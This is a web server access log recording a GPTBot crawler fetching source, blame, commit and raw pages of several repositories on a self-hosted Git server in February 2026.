"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10464] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:15:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:25:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:15:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/PythonTest/README.md" +[17/Feb/2026:15:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 20826] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10171] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 14775] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 20146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11601] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:15:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2findex.html" [Client 74.7.227.38] [Length 36375] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:15:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14304] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2ffallback_http_error.log" [Client 74.7.227.38] [Length 23210] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10665] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2ffallback_http_error.log" [Client 74.7.227.38] [Length 22191] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10943] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27658] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27627] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11551] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27656] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11578] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" +[17/Feb/2026:15:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11765] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" +[17/Feb/2026:15:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13517] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:15:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fstatus.json" [Client 74.7.227.38] [Length 19738] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" +[17/Feb/2026:15:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27661] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 12505] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:15:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10937] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:15:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11067] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10593] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:15:25:47 +0000] - 200 200 